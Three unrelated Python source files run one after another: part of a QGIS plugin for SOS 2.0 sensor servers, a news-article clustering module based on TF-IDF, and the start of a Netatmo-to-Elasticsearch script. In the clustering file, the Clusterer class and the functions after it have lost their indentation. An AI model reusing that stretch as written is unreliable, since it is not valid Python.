        self.WGS84bbox_set = set()  # Set which will contain the
        # bounding box of each station and thus
        # the identifier of each station as the
        # spatial information is used to select
        # the station here.
        self.WGS84bbox_list = []
        self.selected_station_index = 0
        self.offering = ''
        self.observedproperty = ''
        self.unit = ''
        self.getobs_response = ''  # GetObservation response.
        # QGIS related attributes.
        #
        # Initialize station layer.
        self.stations_layer = QgsVectorLayer("Point?crs=epsg:4326",
                                             "Features of interest", "memory")
        # Define "myint" attribute to store the id of the stations.
        self.stations_layer.dataProvider().addAttributes(
            [QgsField('myint', QtCore.QVariant.Int)]
        )
        self.stations_layer.updateFields()
        # Set the symbol used to visualize stations.
        self.station_symbol_layer = QgsSvgMarkerSymbolLayerV2(size=10)
        self.filepath = resolve('ic_place_black_48px.svg')
        self.station_symbol_layer.setPath(self.filepath)
        self.stations_layer.rendererV2().symbols()[0].changeSymbolLayer(
            0, self.station_symbol_layer)
        # Fill OfferingComboBox with all offerings of the newly selected
        # station from "Features of interest" vector layer - spatially
        # selected in QGIS - each time the layer selection changes.
        self.stations_layer.selectionChanged.connect(self.fillOfferingComboBox)
        # Initialize calendars used to select time series starting-
        # and ending time.
        self.start_calendar = CalendarWindow()
        self.start_calendar.setWindowTitle("Starting Time Selection")
        self.ending_calendar = CalendarWindow()
        self.ending_calendar.setWindowTitle("Ending Time Selection")
        # Initialize boolean to indicate if a time series has already been
        # successfully retrieved, so that no additional GetObservation request
        # is sent when, for instance, exporting time series after having
        # plotted it.
        self.getseries_boolean = False

    def resetGetSeriesBoolean(self):
        """Mark the currently stored time series as stale."""
        self.getseries_boolean = False

    def initUI(self):
        """Set window chrome and connect every widget signal to its slot."""
        self.setWindowTitle('SOS Client')
        self.statusBar = QtGui.QStatusBar()
        self.setStatusBar(self.statusBar)
        # Initialize first block of main window (SOS 2.0 server selection and
        # general server information retrieval) related attributes and signals
        # and slots connection management.
        self.select_sos_server_pushButton.clicked.connect(
            self.showServerSelectionDialog)
        self.get_server_informaton_pushButton.clicked.connect(
            self.getServerInformation)
        # Initialize second block of main window (GetObservation request
        # parameters selection) related attributes and signals and slots
        # connection management.
        self.select_offering_comboBox.currentIndexChanged.connect(
            self.fillObservedPropertiesComboBox)
        self.select_offering_comboBox.currentIndexChanged.connect(
            self.resetGetSeriesBoolean)
        self.starting_time_pushButton.clicked.connect(self.showStartCalendar)
        self.ending_time_pushButton.clicked.connect(self.showEndingCalendar)
        # Initialize third block of main window (plugin functionalities,
        # plot time series, visualize it in tabular format, export it)
        # related attributes and signals and slots connection management.
        self.plot_pushButton.clicked.connect(self.plotTimeSeries)
        self.table_view_pushButton.clicked.connect(self.arrayTimeSeries)
        self.export_as_csv_pushButton.clicked.connect(self.exportTimeSeries)

    ##########################################################################
    ####### First block of main window related functions.
    ####### SOS 2.0 server selection and general server information retrieval
    ##########################################################################
    def showServerSelectionDialog(self):
        """Ask for a SOS 2.0 server URL, send a GetCapabilities request and
        (re)build the 'Features of interest' station layer from the offering
        bounding boxes."""
        text, ok = QtGui.QInputDialog.getText(self, 'SOS server selection',
                                              'Enter sos service url:')
        if ok:
            # Reset attributes.
            #
            # Reset UI attributes.
            self.statusBar.clearMessage()
            # Second block of main window attributes.
            self.select_offering_comboBox.clear()
            self.select_prop_comboBox.clear()
            self.starting_time_pushButton.setText("")
            self.ending_time_pushButton.setText("")
            self.time_series_starting_time_value.setText("")
            self.time_series_ending_time_value.setText("")
            # QGIS related attributes.
            # Remove station features and get an empty station layer.
            listOfIds = [feat.id() for feat in self.stations_layer.getFeatures()]
            self.stations_layer.dataProvider().deleteFeatures(listOfIds)
            # Other attributes.
            self.getobs_response = ''
            self.getseries_boolean = False
            # Set attributes using retrieved SOS server information.
            #
            self.sos_service_url = str(text)
            self.getcap_response = requests.get(
                self.sos_service_url + '?REQUEST=GetCapabilities'
                '&SERVICE=SOS&ACCEPTVERSIONS=2.0.0', stream=True)
            self.sos = SensorObservationService(
                None, xml=self.getcap_response.content, version="2.0.0")
            self.WGS84bbox_set = set(
                WGS84conversion(off) for off in self.sos.offerings)
            self.WGS84bbox_list = list(self.WGS84bbox_set)
            # Set UI attributes
            self.selected_sos_server_lineEdit.setText(self.sos_service_url)
            if self.WGS84bbox_list == []:
                # Display error message using QMessageBox.
                empty_bbox_msg = QtGui.QMessageBox()
                empty_bbox_msg.setWindowTitle("Error")
                empty_bbox_msg.setTextFormat(QtCore.Qt.RichText)
                msg_text = (
                    'Each offering bounding box is empty when using '
                    'OWSLib with this SOS 2.0 server'
                )
                empty_bbox_msg.setText(msg_text)
                i_text = (
                    'This plugin uses the Open Source '
                    '<a href=\"https://geopython.github.io/OWSLib/\">OWSlib library</a> '
                    'to retrieve SOS 2.0 data. When collecting offerings '
                    'and their corresponding featureOfInterest bounding '
                    'boxes, only empty lists were retrieved.'
                )
                empty_bbox_msg.setInformativeText(i_text)
                d_text = (
                    'In order to solve the problem, you may want to have '
                    'a look at OWSlib documentation '
                    '(https://geopython.github.io/OWSLib/) and at the '
                    'Python source file '
                    '(https://github.com/geopython/OWSLib/blob/master/owslib/swe/observation/sos200.py/) '
                    'containing the offering class, including the '
                    'bounding box attribute.'
                )
                empty_bbox_msg.setDetailedText(d_text)
                empty_bbox_msg.setIcon(QtGui.QMessageBox.Critical)
                empty_bbox_msg.exec_()
                # Reload station layer as selected SOS server has changed.
                self.stations_layer.triggerRepaint()
            elif self.WGS84bbox_list == [None]:
                # Display warning message using QMessageBox.
                none_bbox_msg = QtGui.QMessageBox()
                none_bbox_msg.setWindowTitle("Warning")
                none_bbox_msg.setTextFormat(QtCore.Qt.RichText)
                msg_text = (
                    "Each offering has 'None' bounding box when using "
                    "OWSLib with this SOS 2.0 server. This plugin uses "
                    "the Open Source "
                    "<a href=\"https://geopython.github.io/OWSLib/\">OWSlib library</a>"
                    " to retrieve SOS 2.0 data. When collecting the "
                    "featureOfInterest bounding box for each offering, "
                    "only None objects were retrieved. Consequently, "
                    "no feature of interest could be added to the "
                    "'Features of interest' layer generated by the plugin."
                )
                none_bbox_msg.setText(msg_text)
                i_text = (
                    'Please select directly an offering in the "Offering" '
                    'combobox to unlock the "ObservedPropery" combobox. '
                    'You will then be able to select all GetObservation '
                    'request parameters and to retrieve desired '
                    'time series.'
                )
                none_bbox_msg.setInformativeText(i_text)
                d_text = (
                    'In order to solve the problem, you may want to have '
                    'a look at OWSlib documentation '
                    '(https://geopython.github.io/OWSLib/) and at the '
                    'Python source file '
                    '(https://github.com/geopython/OWSLib/blob/master/owslib/swe/observation/sos200.py/) '
                    'containing the offering class, including the '
                    'bounding box attribute.'
                )
                none_bbox_msg.setDetailedText(d_text)
                none_bbox_msg.setIcon(QtGui.QMessageBox.Warning)
                none_bbox_msg.exec_()
                # Reload station layer as selected SOS server has changed.
                self.stations_layer.triggerRepaint()
                # Fill OfferingComboBox with all offerings from stations
                # which have None bbox.
                self.selected_station_index = 0
                station = self.WGS84bbox_list[self.selected_station_index]
                for o in GetOfferingsList(self.sos, station).offering_list:
                    self.select_offering_comboBox.addItem(o.id)
            else:
                # Stations bbox content is valid.
                #
                # For each station...
                for i, s in enumerate(self.WGS84bbox_list):
                    # Define pairs of coordinates of two points which
                    # generate the bounding box of this stations.
                    if s is not None:
                        xmin = min(s[1], s[3])
                        xmax = max(s[1], s[3])
                        ymin = min(s[0], s[2])
                        ymax = max(s[0], s[2])
                        # Create new point which represents the station.
                        # Here, we choose to set station location using the point
                        # which has min lat and min long, as several SOS 2.0
                        # we have tested lead to two points coinciding.
                        # Therefore, we make the assumption xmin==xmax and
                        # ymin==ymax.
                        # When it is not the case, station location is likely
                        # to be incorrect.
                        # Further development is required to solve this issue.
                        new_feature = QgsFeature()
                        new_feature.setGeometry(QgsGeometry.fromPoint(
                            QgsPoint(xmin, ymin)))
                        new_feature.setAttributes([i])
                        self.stations_layer.dataProvider().addFeatures(
                            [new_feature])
                # Update layer and refresh QGIS canvas extent.
                self.stations_layer.updateExtents()
                QgsMapLayerRegistry.instance().addMapLayer(self.stations_layer)
                self.stations_layer.triggerRepaint()
                canvas = qgis.utils.iface.mapCanvas()
                canvas.setExtent(self.stations_layer.extent())
                # Inform user he/she has to spatially select a station from
                # newly added 'Features of interest' layer.
                foi_layer_msg = QtGui.QMessageBox()
                foi_layer_msg.setWindowTitle("Information")
                msg_text = (
                    'A "Features of interest" layer has been added to the map!')
                foi_layer_msg.setText(msg_text)
                i_text = (
                    'Please select a station of the "Features of interest" '
                    'layer using the select features tool of the QGIS '
                    'toolbar to unlock the "Offering" combobox and the '
                    '"ObservedPropery" combobox. You will then be able to '
                    'select all GetObservation request parameters and to '
                    'retrieve desired time series.'
                )
                foi_layer_msg.setInformativeText(i_text)
                foi_layer_msg.setIcon(QtGui.QMessageBox.Information)
                foi_layer_msg.exec_()

    def getServerInformation(self):
        """Show the GetCapabilities information for the selected server, or an
        error dialog when no server has been selected yet."""
        if self.sos_service_url != '' and self.sos_service_url is not None:
            getCapabilitiesSOS200(self.getcap_response)
        else:
            QtGui.QMessageBox.critical(
                self, "Critical error",
                'SOS server has not been selected. Please select one '
                'using the "Select SOS 2.0 server" button above.'
            )

    ##########################################################################
    ####### Second block of main window related functions.
    ####### GetObservation request parameters selection.
    ##########################################################################
    def fillOfferingComboBox(self):
        """Populate the offering combo box for the station currently selected
        in the 'Features of interest' layer."""
        # Reset attributes.
        #
        # Reset UI attributes.
        self.statusBar.clearMessage()
        self.select_offering_comboBox.clear()
        self.select_prop_comboBox.clear()
        self.time_series_starting_time_value.setText("")
        self.time_series_ending_time_value.setText("")
        self.starting_time_pushButton.setText("")
        self.ending_time_pushButton.setText("")
        # Get selected station.
        features_list = self.stations_layer.selectedFeatures()
        try:
            feat = features_list[0]
            self.selected_station_index = feat['myint']  # selected station
            # is identified by an
            # index which is stored
            # as "myint" attribute
            # value of selected
            # feature of 'Features
            # of interest' layer
            station = self.WGS84bbox_list[self.selected_station_index]
            for o in GetOfferingsList(self.sos, station).offering_list:
                self.select_offering_comboBox.addItem(o.id)
        except IndexError:
            # No feature selected: leave the combo boxes empty.
            pass

    def fillObservedPropertiesComboBox(self):
        """Populate the observed-properties combo box for the selected
        offering and pre-set both calendars to a sensible default period."""
        # Reset attributes.
        #
        # Reset UI attributes.
        self.statusBar.clearMessage()
        self.select_prop_comboBox.clear()
        # Fill observed properties combo box.
        station = self.WGS84bbox_list[self.selected_station_index]
        off = (
            GetOfferingsList(self.sos, station)
            .offering_list[self.select_offering_comboBox.currentIndex()]
        )
        for p in off.observed_properties:
            self.select_prop_comboBox.addItem(p)
        # Set UI attributes related to selected offering, as it has changed.
        #
        # Set a minimum and a maximum date so that the calendar used to select
        # time series starting time prevents user from selecting a date earlier
        # than the begin position of the selected offering or later than its
        # end position.
        self.start_calendar.cal.setMinimumDate(
            QtCore.QDateTime(off.begin_position).date()
        )
        self.start_calendar.cal.setMaximumDate(
            QtCore.QDateTime(off.end_position).date()
        )
        # Set a maximum date so that the calendar used to select time series
        # ending time prevents user from selecting a date later than the
        # end position of the selected offering.
        #
        # Later, a minimum date will be set according to the starting date
        # selected by the user.
        self.ending_calendar.cal.setMaximumDate(
            QtCore.QDateTime(off.end_position).date()
        )
        # Default time period is set to 2 days to prevent user from waiting
        # a very long time for the GetObservation response retrieval.
        self.start_calendar.cal.setSelectedDate(
            QtCore.QDateTime(off.end_position - datetime.timedelta(days=2))
            .date()
        )
        # Default ending time is set according to end position of selected
        # offering.
        self.ending_calendar.cal.setSelectedDate(
            QtCore.QDateTime(off.end_position).date()
        )
        # Update UI attributes text to inform user of every change.
        self.starting_time_pushButton.setText(
            self.start_calendar.cal.selectedDate().toString()
        )
        self.ending_time_pushButton.setText(
            self.ending_calendar.cal.selectedDate().toString()
        )
        self.time_series_starting_time_value.setText(
            QtCore.QDateTime(off.begin_position).date().toString()
        )
        self.time_series_ending_time_value.setText(
            QtCore.QDateTime(off.end_position).date().toString()
        )

    # Create several functions to get a dynamic time management in both
    # starting time and ending time selection calendars.
    def showStartCalendar(self):
        """Show the starting-time calendar and wire its click handlers."""
        self.start_calendar.show()
        self.start_calendar.cal.clicked.connect(self.changeStartingTimeButtonText)
        self.start_calendar.cal.clicked.connect(self.closeStartCalendar)
        self.start_calendar.cal.clicked.connect(self.changeEndingCalendarMinimumDate)

    def changeStartingTimeButtonText(self, date):
        """Reflect the picked starting date on its button and mark the
        current series stale."""
        self.starting_time_pushButton.setText(date.toString())
        self.getseries_boolean = False

    def closeStartCalendar(self):
        self.start_calendar.hide()

    def changeEndingCalendarMinimumDate(self, date):
        """Force the ending date to be at least one day after the start."""
        self.ending_calendar.cal.setMinimumDate(date.addDays(1))

    def showEndingCalendar(self):
        """Show the ending-time calendar and wire its click handlers."""
        self.ending_calendar.show()
        self.ending_calendar.cal.clicked.connect(self.changeEndingTimeButtonText)
        self.ending_calendar.cal.clicked.connect(self.closeEndingCalendar)

    def changeEndingTimeButtonText(self, date):
        """Reflect the picked ending date on its button and mark the
        current series stale."""
        self.ending_time_pushButton.setText(date.toString())
        self.getseries_boolean = False

    def closeEndingCalendar(self):
        self.ending_calendar.hide()

    ##########################################################################
    ####### Third block of main window related functions.
    ####### Plugin functionalities:
    ####### Display time series in tabular, plot time series,
    ####### export time series.
    ##########################################################################
    def getObservation(self, *args):
        """Send the GetObservation request and store the resulting series.

        An optional single positional argument is interpreted as a request
        timeout in seconds.
        """
        starting_time = QtCore.QDateTime(
            self.start_calendar.cal.selectedDate()).toPyDateTime()
        ending_time = QtCore.QDateTime(
            self.ending_calendar.cal.selectedDate()).toPyDateTime()
        try:
            self.statusBar.showMessage('Request in progress')
            if len(args) == 1:  # Check if user has asked for a timeout.
                (self.dates,
                 self.values,
                 self.offering,
                 self.observedproperty,
                 self.unit,
                 self.getobs_response) = getSeriesSOS200(
                    self.sos,
                    self.selected_station_index,
                    self.select_offering_comboBox.currentIndex(),
                    self.select_prop_comboBox.currentIndex(),
                    starting_time,
                    ending_time,
                    timeout=args[0])
            else:
                (self.dates,
                 self.values,
                 self.offering,
                 self.observedproperty,
                 self.unit,
                 self.getobs_response) = getSeriesSOS200(
                    self.sos,
                    self.selected_station_index,
                    self.select_offering_comboBox.currentIndex(),
                    self.select_prop_comboBox.currentIndex(),
                    starting_time,
                    ending_time)
            self.getseries_boolean = True  # From now on a time series has
            # already been successfully
            # retrieved.
        except requests.exceptions.Timeout:
            # Inform user timeout has elapsed.
            self.getobs_response = ''
            QtGui.QMessageBox.critical(
                self, "Timeout error",
                "The timeout has expired. Please change it and try again."
            )
            self.statusBar.showMessage(
                'Failed to retrieve time series as timeout has expired')
        except:
            # Inform user that an error occurred and print traceback.
            error_traceback = traceback.format_exc()
            getobs_error_msg = QtGui.QMessageBox()
            getobs_error_msg.setWindowTitle("Error")
            getobs_error_msg.setTextFormat(QtCore.Qt.RichText)
            getobs_error_msg.setText(
                'Unexpected GetObservation request error. Something went '
                'wrong when we asked this SOS 2.0 server for the '
                'GetObservation response. Please make sure this '
                'GetObservation request leads to a working response from '
                'a browser.'
            )
            getobs_error_msg.setInformativeText(
                'This plugin uses the Open Source '
                '<a href=\"https://geopython.github.io/OWSLib/\">'
                'OWSlib library</a> to retrieve SOS 2.0 data. In order '
                'to fix this error, you might want to take a look at the '
                'Python Error traceback below.'
            )
            getobs_error_msg.setDetailedText(error_traceback)
            getobs_error_msg.setIcon(QtGui.QMessageBox.Critical)
            getobs_error_msg.exec_()
            self.statusBar.showMessage(
                'Failed to retrieve time series for unexpected error')

    def getTimeSeries(self):
        """Drive the whole time-series retrieval workflow (timeout prompt,
        GetObservation request, user feedback on empty results)."""
        # Prepare for GetObservation response retrieval step.
        self.statusBar.clearMessage()
        # Reset attributes.
        self.dates = []
        self.values = []
        self.offering = ''
        self.observedproperty = ''
        self.getobs_response = ''
        ending_time = QtCore.QDateTime(
            self.ending_calendar.cal.selectedDate()).toPyDateTime()
        starting_time = QtCore.QDateTime(
            self.start_calendar.cal.selectedDate()).toPyDateTime()
        # GetObservation response retrieval step.
        #
        # Ask user if he/she wants to set a timeout value, as getting a
        # response to a GetObservation request can take a long time.
        timeout_value = None
        timeout_option = QtGui.QMessageBox.question(
            self, "Timeout option",
            "Parsing the response from a SOS GetObservation request can "
            "be very long. Would you like to set a request timeout?",
            QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.Yes
        )
        if timeout_option == QtGui.QMessageBox.Yes:
            # If user says "Yes", create a dialog window and retrieve input
            # timeout value.
            timeout_value, ok = QtGui.QInputDialog.getInt(
                self, "Timeout value selection",
                "Please enter a timeout value in seconds (integer):",
                value=60, min=0, max=7200
            )
            timeout_value = abs(timeout_value)
            if ok:
                # Launch GetObservation request with timeout_value as
                # additional argument.
                self.getObservation(timeout_value)
        elif (ending_time - starting_time > datetime.timedelta(days=3)):
            # If time period is longer than 3 days, inform user time series
            # retrieval may take some time.
            QtGui.QMessageBox.information(
                self, "Information",
                "Time series retrieval may take some time"
            )
            # Launch GetObservation request with no additional arguments.
            self.getObservation()
        else:
            self.getObservation()
        # GetObservation response retrieval step is over.
        # Inform user about it, and about recognized errors if needed.
        #
        # Recognized errors.
        if self.dates == []:
            # Inform user that date and time column of retrieved time series
            # is empty.
            empty_dates_msgbox = QtGui.QMessageBox()
            empty_dates_msgbox.setWindowTitle("Empty dates list warning")
            empty_dates_msgbox.setText(
                "WARNING: retrieval of time series time data failed! "
                "Please make sure this GetObservation request leads to a "
                "working response from a browser, and retry."
            )
            empty_dates_msgbox.setInformativeText(
                "You might want to take a look at the request XML "
                "reponse below!"
            )
            if not self.getobs_response:
                empty_dates_msgbox.setDetailedText(
                    "Empty GetObservation response")
            else:
                empty_dates_msgbox.setDetailedText(self.getobs_response)
            empty_dates_msgbox.setIcon(QtGui.QMessageBox.Warning)
            empty_dates_msgbox.exec_()
        elif self.values == []:
            empty_values_msgbox = QtGui.QMessageBox()
            empty_values_msgbox.setWindowTitle(
                "Empty observations results values list warning")
            empty_values_msgbox.setText(
                "WARNING: retrieval of time series y-axis data failed. "
                "Please make sure this GetObservation request leads to a "
                "working response from a browser, and retry."
            )
            empty_values_msgbox.setInformativeText(
                "You might want to take a look at the request XML "
                "reponse below!"
            )
            # BUGFIX: this branch previously referenced empty_dates_msgbox,
            # which is undefined here and raised a NameError exactly when
            # values retrieval failed.
            if not self.getobs_response:
                empty_values_msgbox.setDetailedText(
                    "Empty GetObservation response")
            else:
                empty_values_msgbox.setDetailedText(self.getobs_response)
            empty_values_msgbox.setIcon(QtGui.QMessageBox.Warning)
            empty_values_msgbox.exec_()
        else:  # No error occurred.
            QtGui.QMessageBox.information(
                self, "Information",
                "Time series retrieval is finished"
            )
        self.statusBar.clearMessage()
        self.statusBar.showMessage('Time series retrieval process is over')

    def arrayTimeSeries(self):
        """Show the current time series in tabular form, retrieving it
        first when needed."""
        if not self.getseries_boolean:
            # Time series has not been retrieved yet.
            # Reset GetObservation response attribute.
            self.getobs_response = ''
            self.getTimeSeries()
        arraySeries(self.dates, self.values, self.observedproperty, self.unit)

    def plotTimeSeries(self):
        """Plot the current time series, retrieving it first when needed."""
        if not self.getseries_boolean:
            # Time series has not been retrieved yet.
            # Reset GetObservation response attribute.
            self.getobs_response = ''
            self.getTimeSeries()
        plotSeries(self.dates, self.values, self.observedproperty, self.unit)

    def exportTimeSeries(self):
        """Export the current time series as CSV, retrieving it first when
        needed."""
        if not self.getseries_boolean:
            # Time series has not been retrieved yet.
            # Reset GetObservation response attribute.
            self.getobs_response = ''
            self.getTimeSeries()
        # Get path for export from QFileDialog.
        path = QtGui.QFileDialog.getSaveFileName(
            self, 'Export Time Series', self.offering + ".csv", '*.csv')
        exportSeries(
            self.dates, self.values, self.observedproperty, self.unit, path)
|
<reponame>btaguinod/purple-politics<gh_stars>1-10
import numpy as np
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import string
import math
from datetime import datetime
from article import Article
from event import Event
# Fetch the NLTK corpora used by NLPArticle.preprocess_text
# (no-op when already cached locally).
nltk.download('stopwords')
nltk.download('punkt')
class NLPArticle:
    """Article container with vector for similarity comparisons.

    Attributes:
        article (Article): Article object.
        vector (numpy.ndarray): Numpy term-frequency vector representation.
    """

    def __init__(self, article: Article):
        self.article = article
        self.vector = None

    def set_tf_vector(self, index: list[str]) -> list[str]:
        """Calculate and store term frequency vector.

        Args:
            index (list[str]): Word index (may be None or empty; new words
                found in this article are appended to a copy).

        Returns:
            list[str]: Updated word index.
        """
        tokens = self.preprocess_text()
        unique_words = set(tokens)
        text_freq_dict = {word: 0 for word in unique_words}
        for word in tokens:
            text_freq_dict[word] += 1
        if index is None:
            # BUGFIX: previously index.copy() was called before the None
            # check, so a None index crashed before this branch could run.
            new_index = list(unique_words)
        else:
            new_index = index.copy()
            # Membership test against a set instead of the growing list
            # (same arbitrary set-iteration order as before, O(1) lookups).
            known = set(new_index)
            new_index += [word for word in unique_words if word not in known]
        tf = []
        for word in new_index:
            tf.append(text_freq_dict[word] if word in unique_words else 0)
        # Guard against an article whose text is all stopwords/punctuation.
        denominator = len(tokens) if tokens else 1
        self.vector = np.array(tf) / denominator
        return new_index

    def pad_tf_vector(self, padding_len: int):
        """Pad the term frequency vector with zeros.

        Args:
            padding_len (int): Length vector will be extended by.
        """
        self.vector = np.pad(self.vector, (0, padding_len))

    def preprocess_text(self) -> list[str]:
        """Turn text into tokens without stopwords and punctuation.

        Returns:
            list[str]: List of tokens.
        """
        text = self.article.title + ' ' + self.article.description
        text = text.translate(str.maketrans('', '', string.punctuation))
        stop_words = set(stopwords.words('english'))
        tokens = word_tokenize(text)
        # BUGFIX: the stopword test previously used `token.lower` (the bound
        # method, never a member of stop_words) so no stopword was ever
        # filtered; it must call token.lower().
        return [token for token in tokens if token.lower() not in stop_words]
class Cluster:
    """Cluster of NLPArticle objects.

    Attributes:
        nlp_articles (list[NLPArticle]): Stored NLPArticle objects.
        vector (numpy.ndarray): Average of the term-frequency vectors of the
            member NLPArticle objects.
        event_id (str): Identifier of the Event this cluster corresponds to,
            or None for a brand-new cluster.
    """

    def __init__(self, nlp_articles: list[NLPArticle], event_id: str = None):
        self.nlp_articles = nlp_articles
        self.vector = None
        self.event_id = event_id

    def set_tf_vector(self, index: list[str]):
        """Calculate and store average term frequency vector.

        Args:
            index (list[str]): Word index.
        """
        # Accumulate the members' vectors, then average.
        total = np.zeros(len(index))
        for member in self.nlp_articles:
            total = total + member.vector
        self.vector = total / len(self.nlp_articles)

    def pad_tf_vector(self, padding_len: int):
        """Pad the term frequency vector with zeros.

        Args:
            padding_len (int): Length vector will be extended by.
        """
        self.vector = np.pad(self.vector, (0, padding_len))

    def get_event(self) -> Event:
        """Gets event representation.

        Returns:
            Event: Event representation.
        """
        member_articles = [member.article for member in self.nlp_articles]
        return Event(member_articles, self.event_id)
class Clusterer:
"""Clusters Articles into Events.
Attributes:
cluster_threshold (float): Cosine similarity from 0 to 1 for clustering
strictness.
active_threshold (int): Number of days until old events are inactive.
clusters (list[Cluster]): Stored Cluster objects.
inactive_events (list[Events]): Event objects that won't be
considered in clustering.
index (list[str]): Word index.
"""
def __init__(self, cluster_threshold: float = 0.3,
active_threshold: int = 2):
self.cluster_threshold = cluster_threshold
self.active_threshold = active_threshold
self.clusters = []
self.inactive_events = []
self.index = []
def add_events(self, events: list[Event]):
"""Set event objects as clusters and label old events inactive.
Args:
events (list[Event]): Article objects.
"""
today = datetime.today()
for event in events:
nlp_articles = []
for article in event.articles:
nlp_articles.append(NLPArticle(article))
self.clusters.append(Cluster(nlp_articles, event.event_id))
for cluster in self.clusters:
for nlp_article in cluster.nlp_articles:
self.index = nlp_article.set_tf_vector(self.index)
index_len = len(self.index)
for nlp_article in cluster.nlp_articles:
padding_len = index_len - len(nlp_article.vector)
nlp_article.pad_tf_vector(padding_len)
cluster.set_tf_vector(self.index)
def add_articles(self, articles: list[Article]):
"""Add Article objects to cluster.
Args:
articles (list[Article]): Article objects.
"""
articles = sorted(articles, key=lambda x: x.published_time)
nlp_articles = [NLPArticle(article) for article in articles]
for nlp_article in nlp_articles:
self.index = nlp_article.set_tf_vector(self.index)
index_len = len(self.index)
for nlp_article in nlp_articles:
padding_len = index_len - len(nlp_article.vector)
nlp_article.pad_tf_vector(padding_len)
for cluster in self.clusters:
padding_len = index_len - len(cluster.vector)
for cluster_nlp_article in cluster.nlp_articles:
cluster_nlp_article.pad_tf_vector(padding_len)
cluster.pad_tf_vector(padding_len)
inv_doc_freq = self.get_inv_doc_freq(nlp_articles)
for nlp_article in nlp_articles:
closest_dist = 0
closest_cluster = None
for cluster in self.clusters.copy():
article_time = datetime.strptime(
nlp_article.article.published_time,
'%Y-%m-%dT%H:%M:%SZ'
)
cluster_article = max(
cluster.nlp_articles,
key=lambda x: x.article.published_time
).article
cluster_article_time = datetime.strptime(
cluster_article.published_time,
'%Y-%m-%dT%H:%M:%SZ'
)
days_difference = (article_time - cluster_article_time).days
if days_difference > self.active_threshold:
event = cluster.get_event()
event.active = False
self.inactive_events.append(event)
self.clusters.remove(cluster)
continue
new_dist = vector_similarity(
np.multiply(nlp_article.vector, inv_doc_freq),
np.multiply(cluster.vector, inv_doc_freq))
if new_dist > self.cluster_threshold and new_dist > closest_dist:
closest_dist = new_dist
closest_cluster = cluster
if closest_cluster is None:
new_cluster = Cluster([nlp_article])
self.clusters.append(new_cluster)
new_cluster.set_tf_vector(self.index)
else:
closest_cluster.nlp_articles.append(nlp_article)
closest_cluster.set_tf_vector(self.index)
def get_events(self) -> list[Event]:
"""Get Event representation.
Returns:
list[Event]: Event representation.
"""
active_events = [cluster.get_event() for cluster in self.clusters]
return active_events + self.inactive_events
def get_inv_doc_freq(self, nlp_articles: list[NLPArticle]) -> np.ndarray:
    """Calculate inverse document frequency over clustered and extra articles.

    Args:
        nlp_articles (list[NLPArticle]): Extra NLPArticles to use in
            calculations.

    Returns:
        numpy.ndarray: Per-term idf values aligned with ``self.index``;
        terms that occur in no document keep an idf of 0.
    """
    vector_len = len(self.index)
    doc_freq = np.zeros(vector_len)
    # assumes tf vector entries are 0 or in (0, 1], so np.ceil yields a 0/1
    # presence indicator per document -- TODO confirm against NLPArticle
    for nlp_article in nlp_articles:
        doc_freq += np.ceil(nlp_article.vector)
    for cluster in self.clusters:
        for nlp_article in cluster.nlp_articles:
            doc_freq += np.ceil(nlp_article.vector)
    doc_count = len(nlp_articles)
    for cluster in self.clusters:
        doc_count += len(cluster.nlp_articles)
    # Vectorized replacement of the old per-element loop:
    # log((1 / freq) * doc_count) == log(doc_count / freq).
    inv_doc_freq = np.zeros(vector_len)
    seen = doc_freq != 0
    inv_doc_freq[seen] = np.log(doc_count / doc_freq[seen])
    return inv_doc_freq
def vector_similarity(a: np.ndarray, b: np.ndarray) -> float:
    """Calculate cosine similarity between vectors.

    Args:
        a (numpy.ndarray): First numpy vector.
        b (numpy.ndarray): Second numpy vector.

    Returns:
        float: Cosine similarity, or 0.0 when either vector has zero norm
        (previously this divided by zero and produced nan).
    """
    denom = np.linalg.norm(a) * np.linalg.norm(b)
    if denom == 0:
        return 0.0
    return float(a @ b) / denom
|
#!/usr/bin/env python3
# encoding=utf-8
from logging import exception
import signal
import argparse
import configparser
from time import sleep
from os import environ
from pathlib import Path
from datetime import datetime
from xmlrpc.client import Boolean
import pyatmo
import eland as ed
from elasticsearch import Elasticsearch
import pandas as pd
def parse_config(config_file=None):
    """Read an INI configuration file.

    Args:
        config_file: Path-like, str, or the one-element list produced by
            argparse (``nargs=1``); ``None`` falls back to ``config.ini``.

    Returns:
        configparser.ConfigParser: Parsed config (empty if the file is absent).
    """
    _config = configparser.ConfigParser(interpolation=None)
    if config_file is None:
        config_file = Path("config.ini")
    else:
        # BUG FIX: argparse delivers a list (nargs=1) or a str; previously
        # calling .exists() on that raised AttributeError.
        if isinstance(config_file, (list, tuple)):
            config_file = config_file[0]
        config_file = Path(config_file)
    if config_file.exists():
        _config.read(config_file)
    return _config
def parse_args():
    """Parse command-line options.

    ``-f/--file`` selects an alternate configuration file; argparse stores it
    as a one-element list under ``args.config``.
    """
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument(
        "-f", "--file",
        dest="config",
        type=str,
        nargs=1,
        required=False,
    )
    return arg_parser.parse_args()
def shutdown(_signal, _frame=None):
    """Signal handler: request the main polling loop to stop.

    Args:
        _signal: Signal number delivered by the OS.
        _frame: Current stack frame (unused). Python invokes signal handlers
            as ``handler(signum, frame)``; the previous one-argument
            signature raised TypeError whenever a signal actually fired.
    """
    global running
    running = False
def process_station(es, index_name, station, station_name, backup_dir):
    """Normalize one station reading, append it to a CSV backup, and index it.

    Args:
        es: Elasticsearch client passed through to eland.
        index_name: Destination Elasticsearch index.
        station: Mutable dict of raw Netatmo measurements; edited in place.
        station_name: Friendly name stored with the reading.
        backup_dir: Directory prefix (with trailing separator) for the CSV.
    """
    # Convert from C to F
    station['Temperature'] = station['Temperature'] * 1.8 + 32
    if 'min_temp' in station:
        station['min_temp'] = station['min_temp'] * 1.8 + 32
    if 'max_temp' in station:
        station['max_temp'] = station['max_temp'] * 1.8 + 32
    # Store humidity as a 0..1 fraction rather than a percentage.
    station['Humidity'] = station['Humidity'] / 100
    # Coerce numeric fields to float so the Elasticsearch field mapping stays stable.
    if 'Pressure' in station:
        station['Pressure'] = float(station['Pressure'])
    if 'AbsolutePressure' in station:
        station['AbsolutePressure'] = float(station['AbsolutePressure'])
    if 'min_temp' in station:
        station['min_temp'] = float(station['min_temp'])
    if 'max_temp' in station:
        station['max_temp'] = float(station['max_temp'])
    # Convert Timestamps (epoch seconds -> pandas UTC timestamps)
    station['When'] = pd.Timestamp.utcfromtimestamp(station['When'])
    if 'date_min_temp' in station:
